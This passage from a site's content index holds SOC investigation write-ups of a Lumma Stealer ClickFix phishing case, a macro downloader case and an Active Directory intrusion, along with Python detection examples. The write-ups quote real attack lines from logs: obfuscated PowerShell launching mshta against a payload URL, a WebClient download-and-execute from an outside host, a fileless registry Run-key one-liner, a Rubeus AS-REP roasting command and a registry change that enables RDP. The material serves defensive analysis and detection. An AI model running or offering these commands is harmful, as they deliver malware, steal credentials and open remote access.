2026","externalUrl":null,"permalink":"/tags/extension/","section":"Tags","summary":"","title":"Extension","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/fileless-malware/","section":"Tags","summary":"","title":"Fileless Malware","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/iis/","section":"Tags","summary":"","title":"IIS","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/infostealer/","section":"Tags","summary":"","title":"Infostealer","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/keylogger/","section":"Tags","summary":"","title":"Keylogger","type":"tags"},{"content":" Alert # EventID : 316\nEvent Time : Mar, 13, 2025, 09:44 AM\nRule : SOC338 - Lumma Stealer - DLL Side-Loading via Click Fix Phishing\nLevel : Security Analyst\nSMTP Address : 132.232.40.201\nSource Address : update@windows-update.site\nDestination Address : dylan@letsdefend.io\nE-mail Subject : Upgrade your system to Windows 11 Pro for FREE\nDevice Action : Allowed\nTrigger Reason : Redirected site contains a click fix type script for Lumma Stealer distribution. Identification # What was the delivery vector? # The phishing email arrived from update@windows-update.site (SMTP 132.232.40.201) to dylan@letsdefend.io at 09:44 AM - nearly 14 hours before execution, suggesting the user opened it later in the day. The email body impersonated an official Microsoft notification offering a free Windows 11 Pro upgrade with a prominent \u0026ldquo;UPDATE NOW\u0026rdquo; button.\nThe \u0026ldquo;UPDATE NOW\u0026rdquo; button linked to https://www.windows-update.site/. I checked the domain on VirusTotal - 11/95 vendors flagged it as malicious.\nDid the user interact? 
# Proxy logs confirmed that at Mar 13, 2025, 23:26 Dylan\u0026rsquo;s host (172.16.17.216) accessed https://windows-update.site/ with a referrer of https://mail.letsdefend.io/ - confirming the user clicked the link directly from webmail.\nWhat type of attack was attempted? # This is a Click Fix phishing attack - a technique where a malicious webpage presents a fake CAPTCHA or verification prompt instructing the user to manually copy and paste a PowerShell command into the Run dialog (Win+R) or a terminal. The \u0026ldquo;I am not a robot - reCAPTCHA Verification ID\u0026rdquo; string embedded in the command confirms this pattern: it sits after a #, so PowerShell treats it as a comment, and its only job is to make the pasted line look like a verification token to the user. The page presented the user with an obfuscated command disguised as a verification step:\nMar 13 2025 23:26:19\n\u0026#34;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\u0026#34; -w 1 powershell -Command\n(\u0026#39;ms]]]ht]]]a]]].]]]exe https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4\u0026#39; -replace \u0026#39;]\u0026#39;)\n# ✅ \u0026#39;\u0026#39;I am not a robot - reCAPTCHA Verification ID: 3824\n\nMar 13 2025 23:26:31\n\u0026#34;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\u0026#34; -Command\n\u0026#34;mshta.exe https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4\u0026#34;\n\nMar 13 2025 23:26:32\n\u0026#34;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\u0026#34; -w 1 powershell -Command\n(\u0026#39;ms]]]ht]]]a]]].]]]exe https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4\u0026#39; -replace \u0026#39;]\u0026#39;)\n# ✅ \u0026#39;\u0026#39;I am not a robot - reCAPTCHA Verification ID: 3824\u0026#39;\u0026#39; The -replace ']' call strips the bracket characters used to obfuscate mshta.exe, producing a clean command. The two kinds of process entry fit together: the outer PowerShell instance (-w 1 hides its window) evaluates the parenthesised expression and passes the result as the -Command argument to a second powershell.exe, which is the 23:26:31 entry that finally runs mshta.exe with the plain URL. Command-line logging therefore captures both the obfuscated and the resolved form, and a detection that keys on the child entry needs no deobfuscation at all. mshta.exe is a legitimate Windows binary used to execute HTML Applications - abusing it as a LOLBin allows the attacker to fetch and execute remote content without writing a traditional executable to disk. 
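The -replace deobfuscation step above, automated as an added example (my code, not part of the original analysis): it evaluates single-quoted ('…' -replace '…') expressions the way the outer PowerShell instance does, drops the trailing # comment, and reports the LOLBin, the URL and the hidden-window switch that remain. The first sample command line is a constructed copy of the 23:26:19 log entry (the URL is the page's own IOC and is never fetched); the benign second line and the LOLBin list are assumptions.

```python
"""Resolve PowerShell `-replace` obfuscation from a logged command line and
flag what it expands to.

Added example, not code from the original write-up. SAMPLE_COMMAND_LINES are
constructed from the process log quoted above; LOLBINS is an assumption.
"""
import re

# Assumption: binaries worth flagging when they appear in a pasted command.
LOLBINS = ("mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe")

# ('literal' -replace 'pattern')  or  ('literal' -replace 'pattern','replacement')
# A single-quoted PowerShell string escapes a quote by doubling it ('').
_REPLACE_EXPR = re.compile(
    r"\(\s*'((?:[^']|'')*)'\s+-replace\s+'((?:[^']|'')*)'"
    r"(?:\s*,\s*'((?:[^']|'')*)')?\s*\)",
    re.IGNORECASE,
)
_COMMENT = re.compile(r"\s+#.*$")                       # PowerShell ignores text after '#'
_URL = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
_HIDDEN = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+(?:1|hidden)\b", re.IGNORECASE)
_CLICKFIX_MARKER = re.compile(r"i am not a robot|captcha|verification id", re.IGNORECASE)

SAMPLE_COMMAND_LINES = [
    # Constructed copy of the 23:26:19 entry from the investigation.
    r'''"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 powershell -Command '''
    r'''('ms]]]ht]]]a]]].]]]exe https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4' -replace ']') '''
    r'''# ''I am not a robot - reCAPTCHA Verification ID: 3824''',
    # Benign admin one-liner for contrast (constructed).
    r'''"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -Command Get-Service -Name wuauserv''',
]


def _unquote(s):
    return s.replace("''", "'")


def _eval_replace(match):
    """Apply one PowerShell -replace (a regex substitution, case-insensitive).
    .NET and Python regex agree for the simple literal patterns ClickFix uses;
    if the pattern is not valid Python regex, fall back to a literal replace."""
    subject, pattern, repl = (_unquote(g or "") for g in match.groups())
    try:
        return re.sub(pattern, repl, subject, flags=re.IGNORECASE)
    except re.error:
        return subject.replace(pattern, repl)


def analyze_command_line(cmdline):
    """Expand `('..' -replace '..')` expressions and report what would run.
    Only single, non-chained -replace expressions are handled; chained or
    nested ones are left untouched, which still leaves the URL visible."""
    marker = bool(_CLICKFIX_MARKER.search(cmdline))     # check before the comment is dropped
    resolved = _REPLACE_EXPR.sub(_eval_replace, cmdline)
    resolved = _COMMENT.sub("", resolved)
    lolbin = next(
        (b for b in LOLBINS
         if re.search(r"\b" + re.escape(b) + r"\b", resolved, re.IGNORECASE)),
        None,
    )
    url = _URL.search(resolved)
    return {
        "deobfuscated": resolved,
        "lolbin": lolbin,
        "url": url.group(0) if url else None,
        "hidden_window": bool(_HIDDEN.search(resolved)),
        "clickfix_marker": marker,
        "suspicious": bool(lolbin and url),
    }


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(analyze_command_line(line))
```

On the first line the result is the same command the 23:26:31 child process shows in the log: mshta.exe followed by the plain URL, with the hidden-window switch and the fake verification string both flagged. The benign line resolves to itself and is not marked suspicious.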
The payload URL https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4 disguises the payload as a video file.\nNetwork activity confirmed mshta.exe (PID 7284) made a GET request to the payload URL.\nI submitted the URL to VirusTotal - 13/95 vendors flagged https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4 as malicious, confirming it as the Lumma Stealer payload.\nFollowing mshta.exe execution, the host made connections to 132.232.40.201 (the phishing domain) and 35.190.80.1. AbuseIPDB identified 35.190.80.1 as belonging to Google LLC CDN - attackers commonly abuse legitimate CDN infrastructure to host payloads and blend C2 traffic with normal web activity.\nDid anyone else get targeted? # Mail logs show the phishing email was delivered exclusively to dylan@letsdefend.io. No other recipients were identified.\nDid the attack succeed? # The payload was downloaded and executed via mshta.exe. Lumma Stealer is a credential and data theft tool - given successful payload execution, data exfiltration should be assumed until forensic analysis confirms otherwise. The host was contained before persistent C2 communication was confirmed.\nTriage Decision # True Positive. Click Fix phishing led to direct user execution of a PowerShell command, which launched mshta.exe to download and execute a confirmed malicious payload identified as Lumma Stealer. Escalated to L2 for memory acquisition and credential rotation.\nWhat is the impact level? # High. Lumma Stealer targets browser credentials, session cookies, cryptocurrency wallets, and stored passwords. Successful execution on Dylan\u0026rsquo;s host means any credentials stored in the browser or credential manager should be considered compromised pending L2 investigation.\nContainment # Is the attacker still active? # mshta.exe executed the payload and network connections to 35.190.80.1 were observed. 
Until L2 confirms whether Lumma Stealer established persistence or completed exfiltration, the attacker should be considered potentially active.\nIs the endpoint still exposed? # No. Host Dylan (172.16.17.216) was isolated via the Containment toggle in the endpoint management console.\nActions taken # Host Dylan (172.16.17.216) was contained. Domain windows-update[.]site and SMTP IP 132.232.40.201 were blocked at the email gateway and DNS level. Domain overcoatpassably[.]shop was blocked at the proxy. The Google CDN address 35.190.80.1 was deliberately not blocked, since it is shared infrastructure and a block there would break legitimate traffic. Case escalated to L2 for memory acquisition, browser credential rotation, and assessment of data exfiltration scope.\nIOCs # Type | Value | Description\n--- | --- | ---\nEmail | update@windows-update[.]site | phishing sender\nIP | 132.232.40.201 | phishing SMTP and domain hosting\nIP | 35.190.80.1 | Google CDN - possible payload/C2 hosting (shared infrastructure, do not block outright)\nDomain | windows-update[.]site | phishing domain, 11/95 VT\nURL | hxxps://overcoatpassably[.]shop/Z8UZbPyVpGfdRS/maloy.mp4 | Lumma Stealer payload, 13/95 VT\nHost | Dylan (172.16.17.216) | compromised endpoint\nAccount | dylan@letsdefend.io | targeted and compromised account\nProcess | mshta.exe PID 7284 | LOLBin used to fetch and execute payload\nMITRE ATT\u0026amp;CK # Tactic | Technique | ID\n--- | --- | ---\nInitial Access | Phishing: Spearphishing Link | T1566.002\nExecution | User Execution: Malicious Link | T1204.001\nExecution | Command and Scripting Interpreter: PowerShell | T1059.001\nDefense Evasion | System Binary Proxy Execution: Mshta | T1218.005\nDefense Evasion | Obfuscated Files or Information | T1027\nCredential Access | Steal Web Session Cookie | T1539\nCollection | Data from Local System | T1005\nCommand and Control | Ingress Tool Transfer | T1105 ","date":"April 14, 2026","externalUrl":null,"permalink":"/blue_team/ld-lumma-stealer---dll-side-loading-via-click-fix-phishing/","section":"","summary":"A Click Fix phishing email impersonating Microsoft lured Dylan into visiting a malicious site, which executed a disguised PowerShell command launching mshta.exe to download Lumma Stealer payload from overcoatpassably.shop. 
The host was contained before confirmed data exfiltration.","title":"LD-Lumma Stealer - DLL Side-Loading via Click Fix Phishing","type":"blue_team"},{"content":" Alert # 1EventID : 231 2Event Time : Feb, 28, 2024, 08:42 AM 3Rule : SOC205 - Malicious Macro has been executed 4Level : Security Analyst 5Hostname : Jayne 6IP Address : 172.16.17.198 7File Name : edit1-invoice.docm 8File Path : C:\\Users\\LetsDefend\\Downloads\\edit1-invoice.docm 9File Hash : 1a819d18c9a9de4f81829c4cd55a17f767443c22f9b30ca953866827e5d96fb0 10Trigger Reason : Suspicious file detected on system. 11AV/EDR Action : Detected Identification # What was the delivery vector? # Reviewing the Exchange mail server logs confirmed the delivery vector. At Feb 28, 2024, 08:12 AM - 30 minutes before the alert fired - the phishing email arrived from jake.admin@cybercommunity.info (source 172.67.156.165) to jayne@letsdefend.io, carrying the attachment edit1-invoice.docm.zip. The ZIP archive was used to bypass email gateway attachment filtering that would typically block .docm files directly.\nIs the payload malicious? # I submitted the file hash 1a819d18c9a9de4f81829c4cd55a17f767443c22f9b30ca953866827e5d96fb0 to VirusTotal - 26/56 vendors flagged the file as malicious. Static analysis revealed the document contains a hidden macro that triggers automatically when an InkEdit element receives focus, extracting and executing a command from a TextBox control in a hidden window. This non-standard activation method is designed to bypass macro security warnings and analyst sandboxes that do not simulate user interaction. The threat category is identified as downloader.logan / powersh, confirming this is a macro-based downloader.\nWhat did the macro execute? 
# Process creation log Event ID 4688 showed that WINWORD.EXE (PID 4545) spawned powershell.exe under the LetsDefend account:\n1\u0026#39;C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE\u0026#39; /n 2\u0026#39;C:\\Users\\admin\\AppData\\Local\\Temp\\edit1-invoice.docm\u0026#39; PowerShell Script Block Logging Event ID 4104 captured the full command at 08:42 AM:\n1(New-Object System.Net.WebClient).DownloadFile( 2 \u0026#39;http://www.greyhathacker.net/tools/messbox.exe\u0026#39;, 3 \u0026#39;mess.exe\u0026#39; 4) 5Start-Process \u0026#39;mess.exe\u0026#39; The macro used System.Net.WebClient.DownloadFile to fetch messbox.exe from greyhathacker.net and immediately executed it as mess.exe in the current directory - a classic single-stage macro downloader execution pattern.\nDid anyone else get targeted? # The mail log shows the phishing email was addressed exclusively to jayne@letsdefend.io. No other recipients were identified in the delivery logs.\nDid the attack succeed? # Yes. The macro executed successfully, PowerShell spawned and ran the download command, and mess.exe was executed on the host. The EDR detected the activity but the payload reached execution stage before containment.\nTriage Decision # True Positive. A phishing email delivered a macro-enabled document that successfully executed a PowerShell downloader, fetched a second-stage executable from an external attacker domain, and ran it on the endpoint. Escalated to L2.\nWhat is the impact level? # High. The macro executed fully and mess.exe was launched on host Jayne (172.16.17.198). The second-stage payload origin greyhathacker.net is an attacker-controlled domain. Full scope of mess.exe activity requires memory forensics and process tree analysis by L2.\nContainment # Is the attacker still active? # The macro has executed and mess.exe was launched. 
Until L2 confirms whether mess.exe established persistence or C2 communication, the attacker should be considered potentially active on the endpoint.\nIs the endpoint still exposed? # No. Host Jayne was isolated via the Containment toggle in the endpoint management console, cutting it off from the corporate network.\nActions taken # Host Jayne (172.16.17.198) was contained. Sender domain cybercommunity.info and source IP 172.67.156.165 were blocked at the email gateway. Domain greyhathacker[.]net was blocked at the DNS/proxy level. Case escalated to L2 for memory acquisition and full forensic investigation of mess.exe behavior.\nIOCs # Type Value Description Email jake.admin@cybercommunity.info phishing sender IP 172.67.156.165 phishing email source Domain greyhathacker[.]net second-stage payload hosting URL hxxp://www.greyhathacker[.]net/tools/messbox.exe payload download URL File edit1-invoice.docm.zip phishing attachment File edit1-invoice.docm SHA256: 1a819d18c9a9de4f81829c4cd55a17f767443c22f9b30ca953866827e5d96fb0 File mess.exe downloaded second-stage executable Host Jayne (172.16.17.198) compromised endpoint Account LetsDefend account under which macro executed ","date":"April 14, 2026","externalUrl":null,"permalink":"/blue_team/ld-malicious-macro-has-been-executed/","section":"","summary":"A phishing email from jake.admin@cybercommunity.info delivered a ZIP-archived Word macro document, which executed a PowerShell downloader fetching messbox.exe from greyhathacker.net. 
The host Jayne was contained after execution was confirmed.","title":"LD-Malicious Macro Executed","type":"blue_team"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/lolbins/","section":"Tags","summary":"","title":"LOLbins","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/lumma-stealer/","section":"Tags","summary":"","title":"Lumma Stealer","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/memory-analysis/","section":"Tags","summary":"","title":"Memory Analysis","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/mimikatz/","section":"Tags","summary":"","title":"Mimikatz","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/mshta/","section":"Tags","summary":"","title":"Mshta","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/phishing/","section":"Tags","summary":"","title":"Phishing","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/powershell/","section":"Tags","summary":"","title":"PowerShell","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/process-injection/","section":"Tags","summary":"","title":"Process Injection","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/rdp/","section":"Tags","summary":"","title":"RDP","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/rubeus/","section":"Tags","summary":"","title":"Rubeus","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/smb/","section":"Tags","summary":"","title":"SMB","type":"tags"},{"content":" TL;DR # User sanderson on Office-PC executed AdobeUpdater.exe from their Downloads folder - a binary that masquerades as an Adobe updater but is actually ApacheBench compiled as a dropper. 
It immediately established a C2 connection to 223.247.47.74:80, set a registry Run key for persistence, and dropped three tools into the Temp directory: Rubeus (renamed BackupUtility.exe), a PowerShell script, and Mimikatz (renamed DefragTool.exe). After injecting into cmd.exe and spawning PowerShell, the attacker queried the domain controller over LDAP and ran Rubeus to perform AS-REP Roasting against four accounts - sanderson, tcooper, FileShareService, and Administrator. With cracked tcooper credentials, the attacker authenticated to FileServer over the network, enabled RDP by modifying the registry, reconnected from 223.247.47.74 via RDP, navigated to C:\\Shares, and created CrashDump.zip to stage the data.\nInitial Access # I started with a broad query to catch anything suspicious in Downloads around process creation and file activity:\n1index=shadowroast event.code IN (1, 11, 15) AND *Downloads* | sort _time At 01:05:15, CORPNET\\sanderson ran AdobeUpdater.exe from their Downloads folder - parent was Explorer (PID 4340), medium integrity. Four seconds later they ran it again, this time getting PID 4928 at High integrity.\nThe metadata tells the real story - OriginalFileName: ab.exe, Description: ApacheBench command line utility, Company: Apache Software Foundation. 
Someone renamed ApacheBench to look like an Adobe updater.\nPersistence and C2 # Registry Run Key # Within two seconds of execution, PID 4928 wrote a Run key:\n1HKU\\...\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\wyW5PZyF The value is a one-liner that reads a base64 blob from a registry key (HKCU:Software\\EdI86bhr, value OQqd5sjJ) and executes it via iex in a hidden PowerShell window - fileless execution straight from the registry.\n1%%COMSPEC%% /b /c start /b /min powershell -nop -w hidden -c \u0026#34;sleep 0; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item \u0026#39;HKCU:Software\\EdI86bhr\u0026#39;).GetValue(\u0026#39;OQqd5sjJ\u0026#39;))))\u0026#34; C2 Connection # At 01:05:17, two seconds after process creation, event id 3 showed PID 4928 connecting outbound to 223.247.47.74:80. The full timeline of AdobeUpdater.exe activity shows the three key events in tight sequence: creation at 01:05:15, network connection at 01:05:17, registry write at 01:05:58.\nFile Drops # Between 01:07:09 and 01:07:19, event id 11 showed PID 4928 dropping three files into C:\\Users\\Default\\AppData\\Local\\Temp\\:\n1BackupUtility.exe - 01:07:09 2SystemDiagnostics.ps1 - 01:07:14 3DefragTool.exe - 01:07:19 Process Injection # At 01:07:34, AdobeUpdater.exe spawned C:\\Windows\\SysWOW64\\cmd.exe (PID 2320), immediately followed by event id 10 - this event fires when one process opens a handle to another with specific access rights, and is the primary Sysmon indicator for process injection.\nThe event id 10 details show the injection clearly - source is AdobeUpdater.exe (PID 4928), target is cmd.exe (PID 2320), with GrantedAccess: 0x1fffff which is full access to the target process. 
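Breaking the GrantedAccess mask into its individual rights makes the triage call explicit rather than a pattern match on the string 0x1fffff. The Python below is an added example, not code from this write-up or from Sysmon; the bit values are the documented PROCESS_* access rights from winnt.h, and of the three sample events only the first mirrors the page (the lsass.exe rows are assumed, for contrast).

```python
# Added example (not from the write-up): decode a Sysmon Event ID 10 GrantedAccess
# mask into named PROCESS_* rights and triage what the source could do to the target.
# Bit values are the documented process access rights from winnt.h.

PROCESS_RIGHTS = {
    0x0001: 'PROCESS_TERMINATE',
    0x0002: 'PROCESS_CREATE_THREAD',
    0x0004: 'PROCESS_SET_SESSIONID',
    0x0008: 'PROCESS_VM_OPERATION',
    0x0010: 'PROCESS_VM_READ',
    0x0020: 'PROCESS_VM_WRITE',
    0x0040: 'PROCESS_DUP_HANDLE',
    0x0080: 'PROCESS_CREATE_PROCESS',
    0x0100: 'PROCESS_SET_QUOTA',
    0x0200: 'PROCESS_SET_INFORMATION',
    0x0400: 'PROCESS_QUERY_INFORMATION',
    0x0800: 'PROCESS_SUSPEND_RESUME',
    0x1000: 'PROCESS_QUERY_LIMITED_INFORMATION',
    0x2000: 'PROCESS_SET_LIMITED_INFORMATION',
    0x00010000: 'DELETE',
    0x00020000: 'READ_CONTROL',
    0x00040000: 'WRITE_DAC',
    0x00080000: 'WRITE_OWNER',
    0x00100000: 'SYNCHRONIZE',
}
NAMED_BITS = sum(PROCESS_RIGHTS)  # keys are distinct bits, so the sum equals the OR

# Rights a classic VirtualAllocEx / WriteProcessMemory / CreateRemoteThread injection needs.
INJECT_RIGHTS = {'PROCESS_VM_OPERATION', 'PROCESS_VM_WRITE', 'PROCESS_CREATE_THREAD'}


def decode_access(mask):
    '''Return (set of named rights, leftover bits that winnt.h does not name).'''
    named = {name for bit, name in PROCESS_RIGHTS.items() if mask & bit}
    return named, mask & ~NAMED_BITS


def classify_access(mask):
    '''Collapse a mask into the three buckets that matter for triage.'''
    named, _ = decode_access(mask)
    if INJECT_RIGHTS <= named:
        return 'injection-capable'   # can allocate, write and start a thread in the target
    if 'PROCESS_VM_READ' in named:
        return 'memory-read'         # enough for MiniDumpWriteDump-style memory reads
    return 'query-only'


def triage_event(event):
    '''Score one Sysmon Event ID 10 record (GrantedAccess is the hex string Sysmon logs).'''
    mask = int(event['GrantedAccess'], 16)
    verdict = classify_access(mask)
    target = event['TargetImage'].rsplit('\\', 1)[-1].lower()
    severity = 'info'
    if verdict == 'injection-capable':
        severity = 'high'
    elif verdict == 'memory-read' and target == 'lsass.exe':
        severity = 'high'            # read access to LSASS is the credential-dump pattern
    return {'source': event['SourceImage'], 'target': event['TargetImage'],
            'mask': hex(mask), 'verdict': verdict, 'severity': severity}


# Constructed sample events. The first mirrors the write-up (AdobeUpdater.exe -> cmd.exe,
# GrantedAccess 0x1fffff); the other two are assumed, for contrast.
SAMPLE_EVENT10 = [
    {'SourceImage': 'C:\\Users\\sanderson\\Downloads\\AdobeUpdater.exe',
     'TargetImage': 'C:\\Windows\\SysWOW64\\cmd.exe', 'GrantedAccess': '0x1fffff'},
    {'SourceImage': 'C:\\Temp\\dumper.exe',
     'TargetImage': 'C:\\Windows\\System32\\lsass.exe', 'GrantedAccess': '0x1010'},
    {'SourceImage': 'C:\\Windows\\System32\\svchost.exe',
     'TargetImage': 'C:\\Windows\\System32\\lsass.exe', 'GrantedAccess': '0x1000'},
]


def triage_all(events=SAMPLE_EVENT10):
    return [triage_event(e) for e in events]


if __name__ == '__main__':
    for row in triage_all():
        print(row['severity'].upper(), row['verdict'], row['mask'],
              row['source'], '->', row['target'])
```

0x1fffff is PROCESS_ALL_ACCESS, so every named right is present (the two leftover bits, 0xC000, are reserved). The point of decoding is that a detection keyed on the exact value 0x1fffff misses an injector that requests only what it needs, for example 0x2a (VM_OPERATION | VM_WRITE | CREATE_THREAD); keying on the bits catches both.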
The call trace runs through memory allocation and execution APIs in ntdll.dll, wow64.dll, and kernel32.dll - the standard call chain for DLL injection (T1055.001), where the attacker allocates memory in the target process, writes shellcode or a DLL path, and creates a remote thread to execute it. wow64.dll appears because the 32-bit source process is running under WOW64, which is also why its cmd.exe child came from SysWOW64 rather than System32.\nThe injected cmd.exe then spawned powershell.exe with -ep bypass.\nAt 01:07:52, event id 22 (DNS Query) showed a DNS lookup for DC01.CORPNET.local, which resolved to 10.0.0.147 - the attacker was locating the domain controller to prepare for Active Directory attacks.\nPrivilege Escalation - AS-REP Roasting # Rubeus Execution # After several LDAP connections to DC01 at 10.0.0.147:389, at 01:10:45 the attacker executed BackupUtility.exe, which is actually Rubeus (MD5: 95BA181C0359495EFFEF4A990365752F). Rubeus is a command-line toolkit for abusing Kerberos in Windows Active Directory environments: it requests and manipulates tickets, performs pass-the-ticket, and harvests offline-crackable material such as AS-REP and TGS-REP hashes, which lets an attacker elevate privileges and impersonate users in a compromised domain.\n1\u0026#34;C:\\Users\\Default\\AppData\\Local\\Temp\\BackupUtility.exe\u0026#34; asreproast /format:hashcat AS-REP Roasting # The asreproast flag instructs Rubeus to perform AS-REP Roasting - an attack that targets Active Directory accounts with the \u0026ldquo;Do not require Kerberos pre-authentication\u0026rdquo; flag enabled. Normally, when a client requests a Kerberos Ticket Granting Ticket (TGT), the domain controller requires the client to first prove knowledge of the account\u0026rsquo;s password via an encrypted timestamp (pre-authentication). 
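The detection side of the mechanism just described, as an added example that is not part of the write-up: the logic a SIEM rule over Security Event ID 4768 needs in order to separate a roast from normal Kerberos traffic. Field names follow the 4768 event schema; the records are constructed for the demo rather than the real Splunk results, and the client IP 10.0.0.184 is assumed to be Office-PC.

```python
# Added example (not from the write-up): AS-REP Roasting detection over Windows
# Security Event ID 4768 records. PreAuthType 0 means the KDC did not require
# pre-authentication; Status 0x0 means it actually issued the AS-REP.
from collections import defaultdict

# Constructed 4768 records (the source IP 10.0.0.184 is assumed to be Office-PC).
SAMPLE_4768 = [
    {'time': '01:10:46', 'TargetUserName': 'sanderson', 'IpAddress': '10.0.0.184',
     'PreAuthType': '0', 'Status': '0x0', 'TicketEncryptionType': '0x17'},
    {'time': '01:10:46', 'TargetUserName': 'tcooper', 'IpAddress': '10.0.0.184',
     'PreAuthType': '0', 'Status': '0x0', 'TicketEncryptionType': '0x17'},
    {'time': '01:10:47', 'TargetUserName': 'FileShareService', 'IpAddress': '10.0.0.184',
     'PreAuthType': '0', 'Status': '0x0', 'TicketEncryptionType': '0x17'},
    {'time': '01:10:47', 'TargetUserName': 'Administrator', 'IpAddress': '10.0.0.184',
     'PreAuthType': '0', 'Status': '0x0', 'TicketEncryptionType': '0x17'},
    # Normal logon: pre-authentication by encrypted timestamp (type 2), AES256 ticket.
    {'time': '01:11:02', 'TargetUserName': 'jdoe', 'IpAddress': '10.0.0.50',
     'PreAuthType': '2', 'Status': '0x0', 'TicketEncryptionType': '0x12'},
    # Rejected request: no AS-REP was returned, so there is nothing to crack.
    {'time': '01:11:30', 'TargetUserName': 'svc_backup', 'IpAddress': '10.0.0.184',
     'PreAuthType': '0', 'Status': '0x6', 'TicketEncryptionType': '0x17'},
]


def roastable_asreps(events):
    '''AS-REPs an attacker can crack offline: no pre-auth (type 0) and the KDC issued
    the ticket (Status 0x0). Returns {client_ip: {account: encryption_type}}.'''
    hits = defaultdict(dict)
    for ev in events:
        if ev.get('PreAuthType') == '0' and ev.get('Status') == '0x0':
            hits[ev['IpAddress']][ev['TargetUserName']] = ev['TicketEncryptionType']
    return dict(hits)


def roasting_alerts(events, min_accounts=2):
    '''One alert per client that pulled roastable AS-REPs for >= min_accounts accounts.
    RC4 (0x17) tickets are listed separately: that is the $krb5asrep$23$ form hashcat
    mode 18200 cracks, far cheaper than AES (0x11 / 0x12).'''
    alerts = []
    for ip, accounts in roastable_asreps(events).items():
        if len(accounts) >= min_accounts:
            alerts.append({
                'client': ip,
                'accounts': sorted(accounts),
                'rc4_accounts': sorted(a for a, et in accounts.items() if et == '0x17'),
            })
    return alerts


if __name__ == '__main__':
    for alert in roasting_alerts(SAMPLE_4768):
        print(alert['client'], 'roasted', ', '.join(alert['accounts']),
              '(RC4:', ', '.join(alert['rc4_accounts']) + ')')
```

Two things follow from the rule. A single PreAuthType 0 event is not an attack by itself: it fires whenever a pre-auth-disabled account logs on, so the grouping by client and the account threshold do the real work. And because the weakness is a per-account flag, the remediation is to enumerate accounts with the DONT_REQ_PREAUTH bit (0x400000 in userAccountControl) and clear it, not only to block the client.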
For accounts with pre-authentication disabled, the DC skips this check and returns the AS-REP response - part of which is encrypted with a key derived from the account\u0026rsquo;s password. The attacker captures this response and cracks it offline with tools like hashcat to recover the plaintext password, without ever needing to interact with the account directly. A Splunk query for Kerberos TGT requests with pre-auth type 0 (meaning no pre-authentication was required) confirmed the attack succeeded against four accounts:\n1index=shadowroast event.code=4768 winlog.event_data.PreAuthType=0 The query returned 11 events between 01:03:38 and 01:19:20, with target usernames sanderson, tcooper, FileShareService, and Administrator - all returning status 0x0 (success), meaning the AS-REP hashes were successfully obtained for offline cracking.\nMimikatz Execution # At 01:14:46, DefragTool.exe was executed from the Temp directory. Its metadata unmasks it as Mimikatz (MD5: E930B05EFE23891D19BC354A4209BE3E). It was used to impersonate a Domain Controller and request password hashes via the directory replication protocol (MS-DRSR, the DCSync technique), allowing the attacker to dump domain credentials over the network without touching LSASS on the DC itself.\nLateral Movement # FileServer Access # At 01:17:01, event id 4624 records showed tcooper authenticating to FileServer.CORPNET.local - Logon Type 3 (network authentication) originating from 10.0.0.184 multiple times between 01:17:01 and 01:17:50, indicating the attacker was using cracked tcooper credentials to access file shares over the network.\nRDP Enablement # At 01:17:14, the attacker ran a reg.exe command on FileServer to enable incoming RDP connections by setting fDenyTSConnections to 0 - by default this value is 1, which blocks Remote Desktop. 
Setting it to 0 re-enables the Remote Desktop listener; the host firewall must also allow TCP 3389, which the RDP logons that follow show it did:\n1\u0026#34;C:\\Windows\\system32\\reg.exe\u0026#34; add \u0026#34;hklm\\system\\currentcontrolset\\control\\terminal server\u0026#34; /f /v fDenyTSConnections /t REG_DWORD /d 0 At 01:19:13 and 01:19:20, event id 4624 Logon Type 10 (Remote Interactive / RDP) confirmed the attacker reconnected from the external C2 IP 223.247.47.74 directly to FileServer via RDP using the tcooper account.\nCollection # At 01:20:44, via the RDP session, a PowerShell command navigated to the shares directory:\n1powershell.exe -noexit -command Set-Location -literalPath \u0026#39;C:\\Shares\u0026#39; At 01:21:04, event id 11 recorded the creation of C:\\Users\\Default\\AppData\\Local\\Temp\\CrashDump.zip - the attacker archived the contents of the Shares directory into a ZIP file named to blend in with legitimate crash dump artifacts, staging it for exfiltration.\nIOCs # Type Value Description IP 223.247.47.74 attacker C2 and RDP source IP 10.0.0.147 DC01.CORPNET.local - LDAP reconnaissance target File AdobeUpdater.exe MD5: 